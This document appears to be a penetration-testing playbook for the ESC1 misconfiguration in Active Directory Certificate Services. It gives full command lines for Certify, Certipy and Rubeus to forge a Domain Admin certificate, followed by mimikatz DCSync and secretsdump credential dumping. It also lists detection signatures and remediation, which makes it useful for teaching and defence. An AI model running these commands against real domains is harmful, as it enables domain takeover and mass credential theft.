Exploiting Active Directory Certificate Services ESC1

Overview

ESC1 (Escalation Scenario 1) is a critical misconfiguration in Active Directory Certificate Services where a certificate template allows a low-privileged user to request a certificate on behalf of any other user, including Domain Admins. The vulnerability exists when a template has the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag enabled (also called "Supply in Request"), combined with an Extended Key Usage (EKU) that permits client authentication (Client Authentication, PKINIT Client Authentication, Smart Card Logon, or Any Purpose). This allows an attacker to specify an arbitrary Subject Alternative Name (SAN) in the certificate request, effectively impersonating any domain user. ESC1 was documented by SpecterOps researchers Will Schroeder and Lee Christensen in their "Certified Pre-Owned" whitepaper (2021) and remains one of the most common AD CS attack paths. The MITRE ATT&CK framework tracks this as T1649 (Steal or Forge Authentication Certificates).

Objectives

Enumerate AD CS infrastructure and certificate templates using Certify or Certipy
Identify vulnerable ESC1 templates with "Supply in Request" enabled
Request a certificate specifying a Domain Admin in the SAN field
Authenticate using the forged certificate via PKINIT to obtain a TGT
Escalate privileges to Domain Admin using the obtained Kerberos ticket
Document the full attack chain for the engagement report

MITRE ATT&CK Mapping

T1649 - Steal or Forge Authentication Certificates
T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket
T1078.002 - Valid Accounts: Domain Accounts
T1484 - Domain Policy Modification
T1087.002 - Account Discovery: Domain Account

Implementation Steps

Phase 1: AD CS Enumeration

Enumerate Certificate Authority (CA) servers in the domain:

# Using Certify (Windows)
Certify.exe cas

# Using Certipy (Linux/Python)
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.10.10.1

Enumerate all certificate templates and identify vulnerable ones:

# Using Certify - find vulnerable templates
Certify.exe find /vulnerable

# Using Certipy - outputs JSON and text reports
certipy find -u user@domain.local -p 'Password123' -dc-ip 10.10.10.1 -vulnerable

Verify ESC1 conditions on identified templates:
- msPKI-Certificate-Name-Flag contains ENROLLEE_SUPPLIES_SUBJECT
- pkiExtendedKeyUsage contains Client Authentication or Smart Card Logon
- msPKI-Enrollment-Flag does not require manager approval
- Low-privileged group (Domain Users, Authenticated Users) has Enroll rights

Phase 2: Certificate Request with Arbitrary SAN

Request a certificate using the vulnerable template, specifying a Domain Admin in the SAN:

# Using Certify (Windows)
Certify.exe request /ca:DC01.domain.local\domain-CA /template:VulnerableTemplate /altname:administrator

# Using Certipy (Linux)
certipy req -u user@domain.local -p 'Password123' -ca 'domain-CA' -target DC01.domain.local -template VulnerableTemplate -upn administrator@domain.local

The CA issues a certificate with the Domain Admin's UPN in the SAN field
Save the output certificate in PFX/PEM format

Phase 3: Authentication with Forged Certificate

Convert the certificate if needed (Certify outputs PEM, convert to PFX):

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Authenticate using PKINIT to obtain a TGT for the impersonated user:

# Using Rubeus (Windows)
Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /password:<pfx-password> /ptt

# Using Certipy (Linux)
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1

The TGT is now loaded in memory (Windows) or the NT hash is recovered (Linux)

Phase 4: Domain Privilege Escalation

With the Domain Admin TGT, perform privileged operations:

# DCSync to dump all domain credentials
mimikatz.exe "lsadump::dcsync /domain:domain.local /all"

# Or using secretsdump.py with the obtained NT hash
secretsdump.py domain.local/administrator@DC01.domain.local -hashes :ntlmhash

Validate Domain Admin access:

# List domain controllers
dir \\DC01.domain.local\C$

# Access Domain Admin shares
dir \\DC01.domain.local\SYSVOL

Tools and Resources

Tool	Purpose	Platform
Certify	AD CS enumeration and certificate requests	Windows (.NET)
Certipy	AD CS enumeration, request, and authentication	Linux (Python)
Rubeus	Kerberos authentication with certificates (PKINIT)	Windows (.NET)
Mimikatz	Credential dumping post-escalation	Windows
secretsdump.py	Remote credential dumping (Impacket)	Linux (Python)
PSPKIAudit	PowerShell AD CS auditing module	Windows
ForgeCert	Certificate forgery tool	Windows (.NET)

Vulnerable Template Indicators

Condition	Vulnerable Value
msPKI-Certificate-Name-Flag	ENROLLEE_SUPPLIES_SUBJECT (1)
pkiExtendedKeyUsage	Client Authentication (1.3.6.1.5.5.7.3.2)
Enrollment Rights	Domain Users or Authenticated Users
msPKI-Enrollment-Flag	No manager approval required
CA Setting	No approval workflow enforced

Detection Signatures

Indicator	Detection Method
Certificate request with SAN different from requester	Windows Event 4886 / 4887 on CA server
Unusual PKINIT authentication	Event 4768 with certificate-based pre-auth
Certify.exe or Certipy execution	EDR process monitoring and command-line logging
Mass certificate template enumeration	LDAP query monitoring for pkiCertificateTemplate objects
Certificate issued to non-matching UPN	CA audit logs and certificate transparency

Validation Criteria

AD CS Certificate Authority enumerated
Vulnerable ESC1 templates identified with Certify or Certipy
Certificate requested with Domain Admin SAN successfully
PKINIT authentication performed with forged certificate
Domain Admin TGT obtained
Privileged access to domain controller validated
Full attack chain documented with evidence
Remediation recommendations provided (disable Supply in Request, require manager approval)